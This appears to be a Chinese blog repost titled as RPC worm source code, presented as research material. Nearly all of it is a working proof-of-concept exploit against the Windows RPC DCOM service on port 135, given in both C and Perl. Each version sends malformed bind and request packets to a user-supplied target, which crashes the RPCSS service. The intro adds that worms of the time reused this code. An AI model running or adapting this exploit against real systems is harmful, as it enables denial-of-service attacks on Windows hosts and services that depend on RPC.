RPC蠕虫病毒主要技术源代码

安全焦点网站于2003年7月21日发布了该漏洞的测试代码,现在的RPC蠕虫基本上是利用了该代码,我们现在转载该代码供大家研究。
WINDOWS的RPC服务(RPCSS)存在漏洞,当发送一个畸形包的时候,会导致RPC服务无提示的崩溃掉。由于RPC服务是一个特殊的系统服务,许多应用和服务程序都依赖于他,因为可以造成这些程序与服务的拒绝服务。同时可以通过劫持epmapper管道和135端口的方法来提升权限和获取敏感信息。

代码
#include
#include
#include
#include
#include
#include

unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xA0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x13,0x00,0x00,0x00,
0x90,0x00,0x00,0x00,0x01,0x00,0x03,0x00,0x05,0x00,0x06,0x01,0x00,0x00,0x00,0x00,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};


void main(int argc,char ** argv)
{
  WSADATA WSAData;
int i;
  SOCKET sock;
  SOCKADDR_IN addr_in;

short port=135;
unsigned char buf1[0x1000];
printf("RPC DCOM DOS Vulnerability discoveried by Xfocus.org/n");
printf("Code by FlashSky,[email protected],benjurry,[email protected]/n");
printf("Welcome to http://www.xfocus.net/n");
if(argc<2)
{
 printf("useage:%s target/n",argv[0]);
exit(1);
}


  if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
  {
    printf("WSAStartup error.Error:%d/n",WSAGetLastError());
    return;
  }

  addr_in.sin_family=AF_INET;
  addr_in.sin_port=htons(port);
  addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);

if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
  {
    printf("Socket failed.Error:%d/n",WSAGetLastError());
    return;
  }
if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
{
 printf("Connect failed.Error:%d",WSAGetLastError());
 return;
}
if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)
{
  printf("Send failed.Error:%d/n",WSAGetLastError());
  return;
}

i=recv(sock,buf1,1024,MSG_PEEK);
if (send(sock,request,sizeof(request),0)==SOCKET_ERROR)
{
  printf("Send failed.Error:%d/n",WSAGetLastError());
  return;
}
i=recv(sock,buf1,1024,MSG_PEEK);
}


#!/usr/bin/perl -w
# By SecurITeam"s Experts
my $bindstr = "/x05/x00/x0B/x03/x10/x00/x00/x00/x48/x00/x00/x00/x7F/x00/x00/x00/xD0/x16/xD0/x16/x00/x00/x00/x00/x01/x00/x00/x00/x01/x00/x01/x00/xA0/x01/x00/x00/x00/x00/x00/x00/xC0/x00/x00/x00/x00/x00/x00/x46/x00/x00/x00/x00/x04/x5D/x88/x8A/xEB/x1C/xC9/x11/x9F/xE8/x08/x00/x2B/x10/x48/x60/x02/x00/x00/x00";

my $request = "/x05/x00/x00/x03/x10/x00/x00/x00/x48/x00/x00/x00/x13/x00/x00/x00/x90/x00/x00/x00/x01/x00/x03/x00/x05/x00/x06/x01/x00/x00/x00/x00/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x00/x00/x00/x00/x00/x00/x00/x00";

use Socket;
$proto = getprotobyname("tcp");
socket(S, PF_INET, SOCK_STREAM, $proto) || die("Socket problems/n");

$IP = $ARGV[0];
$target = inet_aton($IP);
$paddr = sockaddr_in(135, $target);

connect(S, $paddr) || die "connect: $!";

select(S); $|=1;

print $bindstr;

sleep(2);

print $request;
sleep(2);

select(STDOUT);
close(S);

 

你可能感兴趣的:(病毒研究)